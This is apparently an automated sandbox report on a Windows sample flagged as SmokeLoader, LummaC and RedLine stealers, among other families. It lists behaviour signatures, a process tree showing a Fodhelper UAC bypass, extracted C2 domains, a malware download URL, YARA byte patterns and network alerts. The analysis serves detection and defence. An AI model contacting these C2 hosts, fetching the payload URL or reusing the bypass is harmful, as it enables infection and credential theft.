Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ZRgv8wdMtR.exe

Overview

General Information

Sample name:ZRgv8wdMtR.exe
renamed because original name is a hash value
Original sample name:82fca540e2348eaf0f7c70992ac6c98a.exe
Analysis ID:1365407
MD5:82fca540e2348eaf0f7c70992ac6c98a
SHA1:d3d3862992a003ab31a2776d89d563f9527f7bfc
SHA256:ba67c24a22b57b646340c7355e30b1f9f837f472fdb3b701fc0ae10cbc176304
Tags:exeLummaStealer
Infos:

Detection

Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader, Socks5Systemz
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Benign windows process drops PE files
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
UAC bypass detected (Fodhelper)
Yara detected Glupteba
Yara detected LummaC Stealer
Yara detected Petite Virus
Yara detected RedLine Stealer
Yara detected SmokeLoader
Yara detected Socks5Systemz
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Connects to many ports of the same IP (likely port scanning)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Deletes itself after installation
Drops PE files with benign system names
Found Tor onion address
Found evasive API chain (may stop execution after checking computer name)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Hides threads from debuggers
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for sample
Maps a DLL or memory area into another process
May use the Tor software to hide its network traffic
PE file contains section with special chars
PE file has nameless sections
Probes for web service weaknesses (weak passwords or vulnerabilities)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to resolve many domain names, but no domain seems valid
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Abnormal high CPU Usage
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Connects to many different domains
Connects to several IPs in different countries
Contains capabilities to detect virtual machines
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain (may stop execution after checking a module file name)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Registers a DLL
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses 32bit PE files
Uses FTP
Uses Microsoft's Enhanced Cryptographic Provider
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • ZRgv8wdMtR.exe (PID: 4924 cmdline: C:\Users\user\Desktop\ZRgv8wdMtR.exe MD5: 82FCA540E2348EAF0F7C70992AC6C98A)
    • explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
      • 8F78.exe (PID: 3468 cmdline: C:\Users\user\AppData\Local\Temp\8F78.exe MD5: 59646583129ACF5244D686F15AADB25A)
        • 8F78.exe (PID: 5304 cmdline: C:\Users\user\AppData\Local\Temp\8F78.exe MD5: 59646583129ACF5244D686F15AADB25A)
      • A19A.exe (PID: 6432 cmdline: C:\Users\user\AppData\Local\Temp\A19A.exe MD5: 033576B4B54E5CB69EC8491FF6624C9F)
        • A19A.exe (PID: 1740 cmdline: C:\Users\user\AppData\Local\Temp\A19A.exe MD5: 033576B4B54E5CB69EC8491FF6624C9F)
      • regsvr32.exe (PID: 6684 cmdline: regsvr32 /s C:\Users\user\AppData\Local\Temp\A748.dll MD5: B0C2FA35D14A9FAD919E99D9D75E1B9E)
        • regsvr32.exe (PID: 3156 cmdline: /s C:\Users\user\AppData\Local\Temp\A748.dll MD5: 878E47C8656E53AE8A8A21E927C6F7E0)
      • B013.exe (PID: 4460 cmdline: C:\Users\user\AppData\Local\Temp\B013.exe MD5: 62C9E15DD99C7D3B7367DCF220579C54)
      • B43A.exe (PID: 6064 cmdline: C:\Users\user\AppData\Local\Temp\B43A.exe MD5: 08DEB048589E4E6D6F16AB66BD1020F8)
        • conhost.exe (PID: 2000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • csrss.exe (PID: 6884 cmdline: "C:\ProgramData\Drivers\csrss.exe" MD5: 59646583129ACF5244D686F15AADB25A)
        • csrss.exe (PID: 4320 cmdline: "C:\ProgramData\Drivers\csrss.exe" MD5: 59646583129ACF5244D686F15AADB25A)
      • CA06.exe (PID: 3492 cmdline: C:\Users\user\AppData\Local\Temp\CA06.exe MD5: F98FBCB2A906CCA96365F1D00E6EDEB4)
      • E36B.exe (PID: 3980 cmdline: C:\Users\user\AppData\Local\Temp\E36B.exe MD5: 2263495C4A9413605BA6D61AFE170F1F)
        • E36B.exe (PID: 3520 cmdline: C:\Users\user\AppData\Local\Temp\E36B.exe MD5: 2263495C4A9413605BA6D61AFE170F1F)
          • cmd.exe (PID: 2328 cmdline: C:\Windows\Sysnative\cmd.exe /C fodhelper MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 1308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • fodhelper.exe (PID: 4020 cmdline: fodhelper MD5: 85018BE1FD913656BC9FF541F017EACD)
            • fodhelper.exe (PID: 3084 cmdline: "C:\Windows\system32\fodhelper.exe" MD5: 85018BE1FD913656BC9FF541F017EACD)
            • fodhelper.exe (PID: 6184 cmdline: "C:\Windows\system32\fodhelper.exe" MD5: 85018BE1FD913656BC9FF541F017EACD)
              • E36B.exe (PID: 3396 cmdline: "C:\Users\user\AppData\Local\Temp\E36B.exe" MD5: 2263495C4A9413605BA6D61AFE170F1F)
                • E36B.exe (PID: 1888 cmdline: "C:\Users\user\AppData\Local\Temp\E36B.exe" MD5: 2263495C4A9413605BA6D61AFE170F1F)
      • csrss.exe (PID: 5752 cmdline: "C:\ProgramData\Drivers\csrss.exe" MD5: 59646583129ACF5244D686F15AADB25A)
        • csrss.exe (PID: 2944 cmdline: "C:\ProgramData\Drivers\csrss.exe" MD5: 59646583129ACF5244D686F15AADB25A)
      • FC24.exe (PID: 5948 cmdline: C:\Users\user\AppData\Local\Temp\FC24.exe MD5: EA7FF3104CAA0FF12EEF81A13532235C)
        • FC24.tmp (PID: 2228 cmdline: "C:\Users\user\AppData\Local\Temp\is-EM1CB.tmp\FC24.tmp" /SL5="$50482,8207148,54272,C:\Users\user\AppData\Local\Temp\FC24.exe" MD5: DC768C91E97B42F218028EFA028C41CC)
          • FC24.exe (PID: 3284 cmdline: "C:\Users\user\AppData\Local\Temp\FC24.exe" /SPAWNWND=$3048A /NOTIFYWND=$50482 MD5: EA7FF3104CAA0FF12EEF81A13532235C)
            • FC24.tmp (PID: 4000 cmdline: "C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmp" /SL5="$5008E,8207148,54272,C:\Users\user\AppData\Local\Temp\FC24.exe" /SPAWNWND=$3048A /NOTIFYWND=$50482 MD5: DC768C91E97B42F218028EFA028C41CC)
              • net.exe (PID: 6064 cmdline: "C:\Windows\system32\net.exe" helpmsg 20 MD5: 31890A7DE89936F922D44D677F681A7F)
                • conhost.exe (PID: 4432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • net1.exe (PID: 1344 cmdline: C:\Windows\system32\net1 helpmsg 20 MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)
              • splitcontrolvb.exe (PID: 1272 cmdline: "C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe" -i MD5: ADAF229BB6CEC48AC6D680EBF4856015)
              • splitcontrolvb.exe (PID: 5104 cmdline: "C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe" -s MD5: ADAF229BB6CEC48AC6D680EBF4856015)
      • explorer.exe (PID: 3176 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)
      • explorer.exe (PID: 5288 cmdline: C:\Windows\explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
  • wesswwi (PID: 3320 cmdline: C:\Users\user\AppData\Roaming\wesswwi MD5: 82FCA540E2348EAF0F7C70992AC6C98A)
  • gwsswwi (PID: 5660 cmdline: C:\Users\user\AppData\Roaming\gwsswwi MD5: F98FBCB2A906CCA96365F1D00E6EDEB4)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
GluptebaGlupteba is a trojan horse malware that is one of the top ten malware variants of 2021. After infecting a system, the Glupteba malware can be used to deliver additional malware, steal user authentication information, and enroll the infected system in a cryptomining botnet.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.glupteba
NameDescriptionAttributionBlogpost URLsLink
RedLine StealerRedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
NameDescriptionAttributionBlogpost URLsLink
SmokeLoaderThe SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.
  • SMOKY SPIDER
https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader
{"C2 url": ["dayfarrichjwclik.fun", "neighborhoodfeelsa.fun", "ratefacilityframw.fun", "reviveincapablewew.pw", "cakecoldsplurgrewe.pw", "opposesicknessopw.pw", "politefrightenpowoa.pw"], "Build id": "NmLpQW--spam2"}
{"Version": 2022, "C2 list": ["http://snukerukeutit.org/", "http://lightseinsteniki.org/", "http://tyiuiunuewqy.org/", "http://liuliuoumumy.org/", "http://tonimiuyaytre.org/"]}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security
    dump.pcapJoeSecurity_RedLineYara detected RedLine StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      C:\Program Files (x86)\SplitControlVB\bin\x86\is-HI55A.tmpJoeSecurity_PetiteVirusYara detected Petite VirusJoe Security
        C:\Program Files (x86)\SplitControlVB\bin\x86\is-M5NA9.tmpJoeSecurity_PetiteVirusYara detected Petite VirusJoe Security
          C:\Program Files (x86)\SplitControlVB\bin\x86\is-CV65T.tmpJoeSecurity_PetiteVirusYara detected Petite VirusJoe Security
            C:\Program Files (x86)\SplitControlVB\bin\x86\is-N5RMT.tmpJoeSecurity_PetiteVirusYara detected Petite VirusJoe Security
              C:\Program Files (x86)\SplitControlVB\bin\x86\is-M3SQC.tmpJoeSecurity_PetiteVirusYara detected Petite VirusJoe Security
                Click to see the 5 entries
                SourceRuleDescriptionAuthorStrings
                00000000.00000002.1711385659.00000000024C1000.00000004.10000000.00040000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                  00000000.00000002.1711385659.00000000024C1000.00000004.10000000.00040000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
                  • 0x2e4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
                  00000029.00000002.4130064269.00000000029D0000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Socks5SystemzYara detected Socks5SystemzJoe Security
                    00000003.00000002.1951376961.0000000000A11000.00000004.10000000.00040000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                      00000003.00000002.1951376961.0000000000A11000.00000004.10000000.00040000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
                      • 0x2e4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
                      Click to see the 42 entries
                      SourceRuleDescriptionAuthorStrings
                      12.2.B43A.exe.5c0000.1.unpackJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
                        3.2.wesswwi.400000.0.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                          12.2.B43A.exe.400000.0.unpackJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
                            17.3.CA06.exe.890000.0.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                              43.3.gwsswwi.25e0000.0.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                                Click to see the 17 entries
                                No Sigma rule has matched
                                Timestamp:34.94.245.237192.168.2.480497342037771 12/21/23-05:02:22.588923
                                SID:2037771
                                Source Port:80
                                Destination Port:49734
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:34.143.166.163192.168.2.480497362037771 12/21/23-05:02:24.914166
                                SID:2037771
                                Source Port:80
                                Destination Port:49736
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:104.198.2.251192.168.2.480497352037771 12/21/23-05:02:23.318156
                                SID:2037771
                                Source Port:80
                                Destination Port:49735
                                Protocol:TCP
                                Classtype:A Network Trojan was detected

                                Click to jump to signature section

                                Show All Signature Results

                                AV Detection

                                barindex
                                Source: ZRgv8wdMtR.exeAvira: detected
                                Source: https://linkofstrumble.com/fe59b57390b3eb9c78ef311810f298a4/288c47bbc1871b439df19ff4df68f076.exeAvira URL Cloud: Label: malware
                                Source: dayfarrichjwclik.funAvira URL Cloud: Label: malware
                                Source: 00000000.00000002.1711385659.00000000024C1000.00000004.10000000.00040000.00000000.sdmpMalware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://snukerukeutit.org/", "http://lightseinsteniki.org/", "http://tyiuiunuewqy.org/", "http://liuliuoumumy.org/", "http://tonimiuyaytre.org/"]}
                                Source: 12.2.B43A.exe.5c0000.1.unpackMalware Configuration Extractor: LummaC {"C2 url": ["dayfarrichjwclik.fun", "neighborhoodfeelsa.fun", "ratefacilityframw.fun", "reviveincapablewew.pw", "cakecoldsplurgrewe.pw", "opposesicknessopw.pw", "politefrightenpowoa.pw"], "Build id": "NmLpQW--spam2"}
                                Source: cream.hitsturbo.comVirustotal: Detection: 19%Perma Link
                                Source: lightseinsteniki.orgVirustotal: Detection: 20%Perma Link
                                Source: ZRgv8wdMtR.exeVirustotal: Detection: 44%Perma Link
                                Source: ZRgv8wdMtR.exeReversingLabs: Detection: 37%
                                Source: Yara matchFile source: 21.1.E36B.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 42.2.E36B.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 42.1.E36B.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 40.2.E36B.exe.2d515a0.7.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 21.2.E36B.exe.400000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 18.2.E36B.exe.2dd15a0.5.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0000002A.00000002.3052219524.0000000000843000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000012.00000002.2204215062.0000000003213000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002A.00000001.2299335069.0000000000843000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000015.00000001.2202228549.0000000000843000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000015.00000002.2293956463.0000000000843000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000028.00000002.2310762272.0000000003193000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: ZRgv8wdMtR.exeJoe Sandbox ML: detected
                                Source: 0000000C.00000002.2118288328.000000000040D000.00000004.00000001.01000000.0000000C.sdmpString decryptor: dayfarrichjwclik.fun
                                Source: 0000000C.00000002.2118288328.000000000040D000.00000004.00000001.01000000.0000000C.sdmpString decryptor: neighborhoodfeelsa.fun
                                Source: 0000000C.00000002.2118288328.000000000040D000.00000004.00000001.01000000.0000000C.sdmpString decryptor: ratefacilityframw.fun
                                Source: 0000000C.00000002.2118288328.000000000040D000.00000004.00000001.01000000.0000000C.sdmpString decryptor: reviveincapablewew.pw
                                Source: 0000000C.00000002.2118288328.000000000040D000.00000004.00000001.01000000.0000000C.sdmpString decryptor: cakecoldsplurgrewe.pw
                                Source: 0000000C.00000002.2118288328.000000000040D000.00000004.00000001.01000000.0000000C.sdmpString decryptor: opposesicknessopw.pw
                                Source: 0000000C.00000002.2118288328.000000000040D000.00000004.00000001.01000000.0000000C.sdmpString decryptor: politefrightenpowoa.pw
                                Source: 0000000C.00000002.2118288328.000000000040D000.00000004.00000001.01000000.0000000C.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                                Source: 0000000C.00000002.2118288328.000000000040D000.00000004.00000001.01000000.0000000C.sdmpString decryptor: TeslaBrowser/5.5
                                Source: 0000000C.00000002.2118288328.000000000040D000.00000004.00000001.01000000.0000000C.sdmpString decryptor: - Screen Resoluton:
                                Source: 0000000C.00000002.2118288328.000000000040D000.00000004.00000001.01000000.0000000C.sdmpString decryptor: - Physical Installed Memory:
                                Source: 0000000C.00000002.2118288328.000000000040D000.00000004.00000001.01000000.0000000C.sdmpString decryptor: Workgroup: -
                                Source: 0000000C.00000002.2118288328.000000000040D000.00000004.00000001.01000000.0000000C.sdmpString decryptor: NmLpQW--spam2
                                Source: C:\Users\user\AppData\Local\Temp\B43A.exeCode function: 12_2_0060C700 _strlen,CryptStringToBinaryA,CryptStringToBinaryA,12_2_0060C700
                                Source: 8F78.exe, 00000007.00000003.2298021073.00000000038E5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -----BEGIN RSA PUBLIC KEY-----memstr_d7e7816a-9

                                Privilege Escalation

                                barindex
                                Source: C:\Users\user\AppData\Local\Temp\E36B.exeRegistry value created: DelegateExecute
                                Source: C:\Users\user\AppData\Local\Temp\E36B.exeRegistry value created: NULL "C:\Users\user\AppData\Local\Temp\E36B.exe"

                                Bitcoin Miner

                                barindex
                                Source: Yara matchFile source: 21.1.E36B.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 42.2.E36B.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 42.1.E36B.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 40.2.E36B.exe.2d515a0.7.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 21.2.E36B.exe.400000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 18.2.E36B.exe.2dd15a0.5.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0000002A.00000002.3052219524.0000000000843000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000012.00000002.2204215062.0000000003213000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002A.00000001.2299335069.0000000000843000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000015.00000001.2202228549.0000000000843000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000015.00000002.2293956463.0000000000843000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000028.00000002.2310762272.0000000003193000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

                                Compliance

                                barindex
                                Source: C:\Users\user\AppData\Local\Temp\E36B.exeUnpacked PE file: 21.2.E36B.exe.400000.1.unpack
                                Source: C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exeUnpacked PE file: 38.2.splitcontrolvb.exe.400000.0.unpack
                                Source: C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exeUnpacked PE file: 41.2.splitcontrolvb.exe.400000.0.unpack
                                Source: C:\Users\user\AppData\Local\Temp\E36B.exeUnpacked PE file: 42.2.E36B.exe.400000.0.unpack
                                Source: ZRgv8wdMtR.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                Source: C:\Users\user\Desktop\ZRgv8wdMtR.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                                Source: unknownHTTPS traffic detected: 104.21.45.142:443 -> 192.168.2.4:49753 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 104.21.88.149:443 -> 192.168.2.4:49754 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 62.109.151.15:443 -> 192.168.2.4:50446 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 23.239.22.202:443 -> 192.168.2.4:50904 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 216.230.253.85:443 -> 192.168.2.4:50623 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 62.109.151.15:443 -> 192.168.2.4:50943 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 92.240.253.3:443 -> 192.168.2.4:50315 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 141.98.102.194:443 -> 192.168.2.4:50608 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 23.236.62.147:443 -> 192.168.2.4:50940 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 37.9.175.188:443 -> 192.168.2.4:51055 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 141.98.102.194:443 -> 192.168.2.4:50931 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 37.9.175.188:443 -> 192.168.2.4:51056 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 23.239.22.202:443 -> 192.168.2.4:51472 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 216.230.253.85:443 -> 192.168.2.4:50905 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 85.248.129.35:443 -> 192.168.2.4:51384 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 46.229.230.4:443 -> 192.168.2.4:50972 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 46.229.230.4:443 -> 192.168.2.4:50973 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 162.43.104.145:443 -> 192.168.2.4:51449 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 162.43.104.145:443 -> 192.168.2.4:51432 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 46.229.230.4:443 -> 192.168.2.4:50980 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 185.32.160.10:443 -> 192.168.2.4:50974 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 46.229.230.4:443 -> 192.168.2.4:50984 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 92.240.253.3:443 -> 192.168.2.4:51292 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 141.98.102.194:443 -> 192.168.2.4:51290 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 217.26.54.21:443 -> 192.168.2.4:51702 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 185.32.160.10:443 -> 192.168.2.4:51486 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 83.167.249.7:443 -> 192.168.2.4:51512 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 81.0.206.104:443 -> 192.168.2.4:51705 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 46.229.230.106:443 -> 192.168.2.4:51813 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 59.106.13.82:443 -> 192.168.2.4:51725 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 59.106.13.82:443 -> 192.168.2.4:51722 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 83.167.249.7:443 -> 192.168.2.4:52804 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 81.0.206.104:443 -> 192.168.2.4:52797 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 83.167.249.7:443 -> 192.168.2.4:52802 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 83.167.249.7:443 -> 192.168.2.4:52807 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 83.167.249.7:443 -> 192.168.2.4:52810 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 83.167.249.7:443 -> 192.168.2.4:52813 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 83.167.249.7:443 -> 192.168.2.4:52873 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 83.167.249.7:443 -> 192.168.2.4:52879 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 37.9.175.180:443 -> 192.168.2.4:53039 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 64.190.63.111:443 -> 192.168.2.4:53025 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 64.190.63.111:443 -> 192.168.2.4:53023 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 37.9.175.180:443 -> 192.168.2.4:53041 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 83.167.249.7:443 -> 192.168.2.4:53040 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 172.67.152.228:443 -> 192.168.2.4:53577 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 35.190.10.69:443 -> 192.168.2.4:53574 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 89.46.109.20:443 -> 192.168.2.4:53595 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 86.107.32.130:443 -> 192.168.2.4:53797 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 187.45.195.138:443 -> 192.168.2.4:53557 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 89.46.109.20:443 -> 192.168.2.4:53808 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 93.185.102.224:443 -> 192.168.2.4:53828 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 86.107.32.130:443 -> 192.168.2.4:53826 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 93.185.102.224:443 -> 192.168.2.4:53809 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 35.190.10.69:443 -> 192.168.2.4:53908 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 93.184.77.21:443 -> 192.168.2.4:53792 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 93.184.77.21:443 -> 192.168.2.4:53793 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 157.205.193.125:443 -> 192.168.2.4:53560 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 85.248.129.35:443 -> 192.168.2.4:53997 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 68.233.46.109:443 -> 192.168.2.4:54318 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 50.116.86.49:443 -> 192.168.2.4:54372 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 50.116.86.49:443 -> 192.168.2.4:54377 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 83.167.249.7:443 -> 192.168.2.4:53832 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 164.46.93.189:443 -> 192.168.2.4:54120 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 157.205.193.125:443 -> 192.168.2.4:53796 version: TLS 1.2
